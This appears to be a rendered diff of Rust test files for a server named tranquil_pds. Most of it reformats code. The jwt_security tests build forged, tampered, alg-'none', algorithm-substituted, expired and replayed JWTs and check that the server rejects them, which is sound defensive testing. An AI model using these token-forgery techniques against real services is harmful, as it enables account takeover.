assert_eq!(login_new.status(), StatusCode::OK, "New password should work");
74
}
75
76
#[tokio::test]
···
57
.send()
58
.await
59
.expect("Failed to try old password");
60
+
assert_eq!(
61
+
login_old.status(),
62
+
StatusCode::UNAUTHORIZED,
63
+
"Old password should not work"
64
+
);
65
let login_new = client
66
.post(format!(
67
"{}/xrpc/com.atproto.server.createSession",
···
74
.send()
75
.await
76
.expect("Failed to try new password");
77
+
assert_eq!(
78
+
login_new.status(),
79
+
StatusCode::OK,
80
+
"New password should work"
81
+
);
82
}
83
84
#[tokio::test]
+2
-3
tests/common/mod.rs
+2
-3
tests/common/mod.rs
···
1
use aws_config::BehaviorVersion;
2
use aws_sdk_s3::Client as S3Client;
3
use aws_sdk_s3::config::Credentials;
4
-
use tranquil_pds::state::AppState;
5
use chrono::Utc;
6
use reqwest::{Client, StatusCode, header};
7
use serde_json::{Value, json};
···
12
#[allow(unused_imports)]
13
use std::time::Duration;
14
use tokio::net::TcpListener;
15
use wiremock::matchers::{method, path};
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
···
232
.await;
233
}
234
235
-
async fn setup_mock_appview(_mock_server: &MockServer) {
236
-
}
237
238
async fn spawn_app(database_url: String) -> String {
239
use tranquil_pds::rate_limit::RateLimiters;
···
1
use aws_config::BehaviorVersion;
2
use aws_sdk_s3::Client as S3Client;
3
use aws_sdk_s3::config::Credentials;
4
use chrono::Utc;
5
use reqwest::{Client, StatusCode, header};
6
use serde_json::{Value, json};
···
11
#[allow(unused_imports)]
12
use std::time::Duration;
13
use tokio::net::TcpListener;
14
+
use tranquil_pds::state::AppState;
15
use wiremock::matchers::{method, path};
16
use wiremock::{Mock, MockServer, ResponseTemplate};
17
···
232
.await;
233
}
234
235
+
async fn setup_mock_appview(_mock_server: &MockServer) {}
236
237
async fn spawn_app(database_url: String) -> String {
238
use tranquil_pds::rate_limit::RateLimiters;
+8
-14
tests/email_update.rs
+8
-14
tests/email_update.rs
···
84
.await
85
.expect("Failed to confirm email");
86
assert_eq!(res.status(), StatusCode::OK);
87
-
let user = sqlx::query!(
88
-
"SELECT email FROM users WHERE handle = $1",
89
-
handle
90
-
)
91
-
.fetch_one(&pool)
92
-
.await
93
-
.expect("User not found");
94
assert_eq!(user.email, Some(new_email));
95
96
let verification = sqlx::query!(
···
320
.await
321
.expect("Failed to update email");
322
assert_eq!(res.status(), StatusCode::OK);
323
-
let user = sqlx::query!(
324
-
"SELECT email FROM users WHERE handle = $1",
325
-
handle
326
-
)
327
-
.fetch_one(&pool)
328
-
.await
329
-
.expect("User not found");
330
assert_eq!(user.email, Some(new_email));
331
let verification = sqlx::query!(
332
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE handle = $1) AND channel = 'email'",
···
84
.await
85
.expect("Failed to confirm email");
86
assert_eq!(res.status(), StatusCode::OK);
87
+
let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle)
88
+
.fetch_one(&pool)
89
+
.await
90
+
.expect("User not found");
91
assert_eq!(user.email, Some(new_email));
92
93
let verification = sqlx::query!(
···
317
.await
318
.expect("Failed to update email");
319
assert_eq!(res.status(), StatusCode::OK);
320
+
let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle)
321
+
.fetch_one(&pool)
322
+
.await
323
+
.expect("User not found");
324
assert_eq!(user.email, Some(new_email));
325
let verification = sqlx::query!(
326
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE handle = $1) AND channel = 'email'",
+98
-21
tests/image_processing.rs
+98
-21
tests/image_processing.rs
···
1
use tranquil_pds::image::{
2
DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED,
3
THUMB_SIZE_FULL,
4
};
5
-
use image::{DynamicImage, ImageFormat};
6
-
use std::io::Cursor;
7
8
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
9
let img = DynamicImage::new_rgb8(width, height);
10
let mut buf = Vec::new();
11
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
12
buf
13
}
14
15
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
16
let img = DynamicImage::new_rgb8(width, height);
17
let mut buf = Vec::new();
18
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
19
buf
20
}
21
22
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
23
let img = DynamicImage::new_rgb8(width, height);
24
let mut buf = Vec::new();
25
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
26
buf
27
}
28
29
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
30
let img = DynamicImage::new_rgb8(width, height);
31
let mut buf = Vec::new();
32
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
33
buf
34
}
35
···
62
63
let small = create_test_png(100, 100);
64
let result = processor.process(&small, "image/png").unwrap();
65
-
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
66
-
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
67
68
let medium = create_test_png(500, 500);
69
let result = processor.process(&medium, "image/png").unwrap();
70
-
assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail");
71
-
assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail");
72
73
let large = create_test_png(2000, 2000);
74
let result = processor.process(&large, "image/png").unwrap();
75
-
assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail");
76
-
assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail");
77
let thumb = result.thumbnail_feed.unwrap();
78
assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
79
let full = result.thumbnail_full.unwrap();
···
81
82
let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
83
let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
84
-
assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none());
85
-
assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some());
86
87
let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
88
let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
89
-
assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none());
90
-
assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some());
91
92
let disabled = ImageProcessor::new().with_thumbnails(false);
93
let result = disabled.process(&large, "image/png").unwrap();
···
100
let jpeg = create_test_jpeg(300, 300);
101
102
let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
103
-
assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp");
104
105
let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
106
-
assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg");
107
108
let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
109
-
assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png");
110
}
111
112
#[test]
···
116
let max_dim = ImageProcessor::new().with_max_dimension(1000);
117
let large = create_test_png(2000, 2000);
118
let result = max_dim.process(&large, "image/png");
119
-
assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 })));
120
121
let max_file = ImageProcessor::new().with_max_file_size(100);
122
let data = create_test_png(500, 500);
123
let result = max_file.process(&data, "image/png");
124
-
assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. })));
125
}
126
127
#[test]
···
1
+
use image::{DynamicImage, ImageFormat};
2
+
use std::io::Cursor;
3
use tranquil_pds::image::{
4
DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED,
5
THUMB_SIZE_FULL,
6
};
7
8
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
9
let img = DynamicImage::new_rgb8(width, height);
10
let mut buf = Vec::new();
11
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
12
+
.unwrap();
13
buf
14
}
15
16
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
17
let img = DynamicImage::new_rgb8(width, height);
18
let mut buf = Vec::new();
19
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
20
+
.unwrap();
21
buf
22
}
23
24
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
25
let img = DynamicImage::new_rgb8(width, height);
26
let mut buf = Vec::new();
27
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
28
+
.unwrap();
29
buf
30
}
31
32
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
33
let img = DynamicImage::new_rgb8(width, height);
34
let mut buf = Vec::new();
35
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
36
+
.unwrap();
37
buf
38
}
39
···
66
67
let small = create_test_png(100, 100);
68
let result = processor.process(&small, "image/png").unwrap();
69
+
assert!(
70
+
result.thumbnail_feed.is_none(),
71
+
"Small image should not get feed thumbnail"
72
+
);
73
+
assert!(
74
+
result.thumbnail_full.is_none(),
75
+
"Small image should not get full thumbnail"
76
+
);
77
78
let medium = create_test_png(500, 500);
79
let result = processor.process(&medium, "image/png").unwrap();
80
+
assert!(
81
+
result.thumbnail_feed.is_some(),
82
+
"Medium image should have feed thumbnail"
83
+
);
84
+
assert!(
85
+
result.thumbnail_full.is_none(),
86
+
"Medium image should NOT have full thumbnail"
87
+
);
88
89
let large = create_test_png(2000, 2000);
90
let result = processor.process(&large, "image/png").unwrap();
91
+
assert!(
92
+
result.thumbnail_feed.is_some(),
93
+
"Large image should have feed thumbnail"
94
+
);
95
+
assert!(
96
+
result.thumbnail_full.is_some(),
97
+
"Large image should have full thumbnail"
98
+
);
99
let thumb = result.thumbnail_feed.unwrap();
100
assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED);
101
let full = result.thumbnail_full.unwrap();
···
103
104
let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED);
105
let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1);
106
+
assert!(
107
+
processor
108
+
.process(&at_feed, "image/png")
109
+
.unwrap()
110
+
.thumbnail_feed
111
+
.is_none()
112
+
);
113
+
assert!(
114
+
processor
115
+
.process(&above_feed, "image/png")
116
+
.unwrap()
117
+
.thumbnail_feed
118
+
.is_some()
119
+
);
120
121
let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL);
122
let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1);
123
+
assert!(
124
+
processor
125
+
.process(&at_full, "image/png")
126
+
.unwrap()
127
+
.thumbnail_full
128
+
.is_none()
129
+
);
130
+
assert!(
131
+
processor
132
+
.process(&above_full, "image/png")
133
+
.unwrap()
134
+
.thumbnail_full
135
+
.is_some()
136
+
);
137
138
let disabled = ImageProcessor::new().with_thumbnails(false);
139
let result = disabled.process(&large, "image/png").unwrap();
···
146
let jpeg = create_test_jpeg(300, 300);
147
148
let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP);
149
+
assert_eq!(
150
+
webp_proc
151
+
.process(&png, "image/png")
152
+
.unwrap()
153
+
.original
154
+
.mime_type,
155
+
"image/webp"
156
+
);
157
158
let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
159
+
assert_eq!(
160
+
jpeg_proc
161
+
.process(&png, "image/png")
162
+
.unwrap()
163
+
.original
164
+
.mime_type,
165
+
"image/jpeg"
166
+
);
167
168
let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png);
169
+
assert_eq!(
170
+
png_proc
171
+
.process(&jpeg, "image/jpeg")
172
+
.unwrap()
173
+
.original
174
+
.mime_type,
175
+
"image/png"
176
+
);
177
}
178
179
#[test]
···
183
let max_dim = ImageProcessor::new().with_max_dimension(1000);
184
let large = create_test_png(2000, 2000);
185
let result = max_dim.process(&large, "image/png");
186
+
assert!(matches!(
187
+
result,
188
+
Err(ImageError::TooLarge {
189
+
width: 2000,
190
+
height: 2000,
191
+
max_dimension: 1000
192
+
})
193
+
));
194
195
let max_file = ImageProcessor::new().with_max_file_size(100);
196
let data = create_test_png(500, 500);
197
let result = max_file.process(&data, "image/png");
198
+
assert!(matches!(
199
+
result,
200
+
Err(ImageError::FileTooLarge { max_size: 100, .. })
201
+
));
202
}
203
204
#[test]
+318
-84
tests/jwt_security.rs
+318
-84
tests/jwt_security.rs
···
1
#![allow(unused_imports)]
2
mod common;
3
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
-
use tranquil_pds::auth::{
5
-
self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH,
6
-
TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token,
7
-
create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token,
8
-
verify_access_token, verify_refresh_token, verify_token,
9
-
};
10
use chrono::{Duration, Utc};
11
use common::{base_url, client, create_account_and_login, get_db_connection_string};
12
use k256::SecretKey;
···
15
use reqwest::StatusCode;
16
use serde_json::{Value, json};
17
use sha2::{Digest, Sha256};
18
19
fn generate_user_key() -> Vec<u8> {
20
let secret_key = SecretKey::random(&mut OsRng);
···
48
let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature);
49
let result = verify_access_token(&forged_token, &key_bytes);
50
assert!(result.is_err(), "Forged signature must be rejected");
51
-
assert!(result.err().unwrap().to_string().to_lowercase().contains("signature"));
52
53
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
54
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
55
payload["sub"] = json!("did:plc:attacker");
56
let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
57
let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]);
58
-
assert!(verify_access_token(&modified_token, &key_bytes).is_err(), "Modified payload must be rejected");
59
60
let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
61
let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]);
62
let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig);
63
-
assert!(verify_access_token(&truncated_token, &key_bytes).is_err(), "Truncated signature must be rejected");
64
65
let mut extended_sig = sig_bytes.clone();
66
extended_sig.extend_from_slice(&[0u8; 32]);
67
-
let extended_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&extended_sig));
68
-
assert!(verify_access_token(&extended_token, &key_bytes).is_err(), "Extended signature must be rejected");
69
70
let key_bytes_user2 = generate_user_key();
71
-
assert!(verify_access_token(&token, &key_bytes_user2).is_err(), "Token signed with different key must be rejected");
72
}
73
74
#[test]
···
83
"jti": "attack-token", "scope": SCOPE_ACCESS
84
});
85
let none_token = create_unsigned_jwt(&none_header, &claims);
86
-
assert!(verify_access_token(&none_token, &key_bytes).is_err(), "Algorithm 'none' must be rejected");
87
88
let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS });
89
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap());
···
95
mac.update(message.as_bytes());
96
let hmac_sig = mac.finalize().into_bytes();
97
let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig));
98
-
assert!(verify_access_token(&hs256_token, &key_bytes).is_err(), "HS256 substitution must be rejected");
99
100
for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] {
101
let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS });
102
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
103
let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]);
104
let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
105
-
assert!(verify_access_token(&token, &key_bytes).is_err(), "{} substitution must be rejected", alg);
106
}
107
}
108
···
114
let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token");
115
let result = verify_access_token(&refresh_token, &key_bytes);
116
assert!(result.is_err(), "Refresh token as access must be rejected");
117
-
assert!(result.err().unwrap().to_string().contains("Invalid token type"));
118
119
let access_token = create_access_token(did, &key_bytes).expect("create access token");
120
let result = verify_refresh_token(&access_token, &key_bytes);
121
assert!(result.is_err(), "Access token as refresh must be rejected");
122
-
assert!(result.err().unwrap().to_string().contains("Invalid token type"));
123
124
-
let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap();
125
-
assert!(verify_access_token(&service_token, &key_bytes).is_err(), "Service token as access must be rejected");
126
}
127
128
#[test]
···
136
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
137
"jti": "test", "scope": "admin.all"
138
});
139
-
let result = verify_access_token(&create_custom_jwt(&header, &invalid_scope, &key_bytes), &key_bytes);
140
-
assert!(result.is_err() && result.err().unwrap().to_string().contains("Invalid token scope"));
141
142
let empty_scope = json!({
143
"iss": did, "sub": did, "aud": "did:web:test.pds",
144
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
145
"jti": "test", "scope": ""
146
});
147
-
assert!(verify_access_token(&create_custom_jwt(&header, &empty_scope, &key_bytes), &key_bytes).is_err());
148
149
let missing_scope = json!({
150
"iss": did, "sub": did, "aud": "did:web:test.pds",
151
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
152
"jti": "test"
153
});
154
-
assert!(verify_access_token(&create_custom_jwt(&header, &missing_scope, &key_bytes), &key_bytes).is_err());
155
156
for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] {
157
let claims = json!({
···
159
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
160
"jti": "test", "scope": scope
161
});
162
-
assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok());
163
}
164
165
let refresh_scope = json!({
···
167
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
168
"jti": "test", "scope": SCOPE_REFRESH
169
});
170
-
assert!(verify_access_token(&create_custom_jwt(&header, &refresh_scope, &key_bytes), &key_bytes).is_err());
171
}
172
173
#[test]
···
181
"iss": did, "sub": did, "aud": "did:web:test.pds",
182
"iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS
183
});
184
-
let result = verify_access_token(&create_custom_jwt(&header, &expired, &key_bytes), &key_bytes);
185
assert!(result.is_err() && result.err().unwrap().to_string().contains("expired"));
186
187
let future_iat = json!({
188
"iss": did, "sub": did, "aud": "did:web:test.pds",
189
"iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS
190
});
191
-
assert!(verify_access_token(&create_custom_jwt(&header, &future_iat, &key_bytes), &key_bytes).is_ok());
192
193
let just_expired = json!({
194
"iss": did, "sub": did, "aud": "did:web:test.pds",
195
"iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS
196
});
197
-
assert!(verify_access_token(&create_custom_jwt(&header, &just_expired, &key_bytes), &key_bytes).is_err());
198
199
let far_future = json!({
200
"iss": did, "sub": did, "aud": "did:web:test.pds",
201
"iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS
202
});
203
-
let _ = verify_access_token(&create_custom_jwt(&header, &far_future, &key_bytes), &key_bytes);
204
205
let negative_iat = json!({
206
"iss": did, "sub": did, "aud": "did:web:test.pds",
207
"iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS
208
});
209
-
let _ = verify_access_token(&create_custom_jwt(&header, &negative_iat, &key_bytes), &key_bytes);
210
}
211
212
#[test]
213
fn test_malformed_tokens() {
214
let key_bytes = generate_user_key();
215
216
-
for token in ["", "not-a-token", "one.two", "one.two.three.four", "....",
217
-
"eyJhbGciOiJFUzI1NksifQ", "eyJhbGciOiJFUzI1NksifQ.", "eyJhbGciOiJFUzI1NksifQ..",
218
-
".eyJzdWIiOiJ0ZXN0In0.", "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig"] {
219
-
assert!(verify_access_token(token, &key_bytes).is_err(), "Malformed token must be rejected");
220
}
221
222
let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}");
223
let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#);
224
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]);
225
-
assert!(verify_access_token(&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), &key_bytes).is_err());
226
227
let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#);
228
let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}");
229
-
assert!(verify_access_token(&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), &key_bytes).is_err());
230
}
231
232
#[test]
···
239
"iss": did, "sub": did, "aud": "did:web:test",
240
"iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS
241
});
242
-
assert!(verify_access_token(&create_custom_jwt(&header, &missing_exp, &key_bytes), &key_bytes).is_err());
243
244
let missing_iat = json!({
245
"iss": did, "sub": did, "aud": "did:web:test",
246
"exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
247
});
248
-
assert!(verify_access_token(&create_custom_jwt(&header, &missing_iat, &key_bytes), &key_bytes).is_err());
249
250
let missing_sub = json!({
251
"iss": did, "aud": "did:web:test",
252
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS
253
});
254
-
assert!(verify_access_token(&create_custom_jwt(&header, &missing_sub, &key_bytes), &key_bytes).is_err());
255
256
let wrong_types = json!({
257
"iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"},
258
"iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS
259
});
260
-
assert!(verify_access_token(&create_custom_jwt(&header, &wrong_types, &key_bytes), &key_bytes).is_err());
261
262
let unicode_injection = json!({
263
"iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta",
264
"aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
265
"jti": "test", "scope": SCOPE_ACCESS
266
});
267
-
if let Ok(data) = verify_access_token(&create_custom_jwt(&header, &unicode_injection, &key_bytes), &key_bytes) {
268
assert!(!data.claims.sub.contains('\0'));
269
}
270
}
···
308
"iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600,
309
"jti": "test", "scope": SCOPE_ACCESS
310
});
311
-
assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok());
312
313
let valid_token = create_access_token(did, &key_bytes).expect("create token");
314
let parts: Vec<&str> = valid_token.split('.').collect();
315
let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap();
316
almost_valid[0] ^= 1;
317
-
let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&almost_valid));
318
-
let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]));
319
let _ = verify_access_token(&almost_valid_token, &key_bytes);
320
let _ = verify_access_token(&completely_invalid_token, &key_bytes);
321
}
···
327
328
let key_bytes = generate_user_key();
329
let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap();
330
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
331
.header("Authorization", format!("Bearer {}", forged_token))
332
-
.send().await.unwrap();
333
-
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged token must be rejected");
334
335
let (access_jwt, _did) = create_account_and_login(&http_client).await;
336
let parts: Vec<&str> = access_jwt.split('.').collect();
···
338
let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
339
340
payload["exp"] = json!(Utc::now().timestamp() - 3600);
341
-
let expired_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), parts[2]);
342
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
343
.header("Authorization", format!("Bearer {}", expired_token))
344
-
.send().await.unwrap();
345
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
346
347
let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap();
348
tampered_payload["sub"] = json!("did:plc:attacker");
349
tampered_payload["iss"] = json!("did:plc:attacker");
350
-
let tampered_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), parts[2]);
351
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
352
.header("Authorization", format!("Bearer {}", tampered_token))
353
-
.send().await.unwrap();
354
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
355
}
356
···
360
let http_client = client();
361
let (access_jwt, _did) = create_account_and_login(&http_client).await;
362
363
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
364
.header("Authorization", format!("Bearer {}", access_jwt))
365
-
.send().await.unwrap();
366
assert_eq!(res.status(), StatusCode::OK);
367
368
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
369
.header("Authorization", format!("bearer {}", access_jwt))
370
-
.send().await.unwrap();
371
assert_eq!(res.status(), StatusCode::OK);
372
373
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
374
.header("Authorization", format!("Basic {}", access_jwt))
375
-
.send().await.unwrap();
376
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
377
378
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
379
.header("Authorization", &access_jwt)
380
-
.send().await.unwrap();
381
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
382
383
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
384
.header("Authorization", "Bearer ")
385
-
.send().await.unwrap();
386
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
387
}
388
···
392
let http_client = client();
393
let (access_jwt, _did) = create_account_and_login(&http_client).await;
394
395
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
396
.header("Authorization", format!("Bearer {}", access_jwt))
397
-
.send().await.unwrap();
398
assert_eq!(res.status(), StatusCode::OK);
399
400
-
let logout = http_client.post(format!("{}/xrpc/com.atproto.server.deleteSession", url))
401
.header("Authorization", format!("Bearer {}", access_jwt))
402
-
.send().await.unwrap();
403
assert_eq!(logout.status(), StatusCode::OK);
404
405
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
406
.header("Authorization", format!("Bearer {}", access_jwt))
407
-
.send().await.unwrap();
408
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
409
}
410
···
414
let http_client = client();
415
let (access_jwt, _did) = create_account_and_login(&http_client).await;
416
417
-
let deact = http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
418
.header("Authorization", format!("Bearer {}", access_jwt))
419
.json(&json!({}))
420
-
.send().await.unwrap();
421
assert_eq!(deact.status(), StatusCode::OK);
422
423
-
let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url))
424
.header("Authorization", format!("Bearer {}", access_jwt))
425
-
.send().await.unwrap();
426
assert_eq!(res.status(), StatusCode::OK);
427
let body: Value = res.json().await.unwrap();
428
assert_eq!(body["active"], false);
429
430
-
let post_res = http_client.post(format!("{}/xrpc/com.atproto.repo.createRecord", url))
431
.header("Authorization", format!("Bearer {}", access_jwt))
432
.json(&json!({
433
"repo": _did,
···
438
"createdAt": "2024-01-01T00:00:00Z"
439
}
440
}))
441
-
.send().await.unwrap();
442
assert_eq!(post_res.status(), StatusCode::UNAUTHORIZED);
443
let post_body: Value = post_res.json().await.unwrap();
444
assert_eq!(post_body["error"], "AccountDeactivated");
···
452
let handle = format!("rt-replay-jwt-{}", ts);
453
let email = format!("rt-replay-jwt-{}@example.com", ts);
454
455
-
let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
456
.json(&json!({ "handle": handle, "email": email, "password": "test-password-123" }))
457
-
.send().await.unwrap();
458
assert_eq!(create_res.status(), StatusCode::OK);
459
let account: Value = create_res.json().await.unwrap();
460
let did = account["did"].as_str().unwrap();
···
462
let pool = sqlx::postgres::PgPoolOptions::new()
463
.max_connections(2)
464
.connect(&get_db_connection_string().await)
465
-
.await.unwrap();
466
let code: String = sqlx::query_scalar!(
467
"SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'",
468
did
469
).fetch_one(&pool).await.unwrap();
470
471
-
let confirm = http_client.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url))
472
.json(&json!({ "did": did, "verificationCode": code }))
473
-
.send().await.unwrap();
474
assert_eq!(confirm.status(), StatusCode::OK);
475
let confirmed: Value = confirm.json().await.unwrap();
476
let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string();
477
478
-
let first = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
479
.header("Authorization", format!("Bearer {}", refresh_jwt))
480
-
.send().await.unwrap();
481
assert_eq!(first.status(), StatusCode::OK);
482
483
-
let replay = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url))
484
.header("Authorization", format!("Bearer {}", refresh_jwt))
485
-
.send().await.unwrap();
486
assert_eq!(replay.status(), StatusCode::UNAUTHORIZED);
487
}
···
1
#![allow(unused_imports)]
2
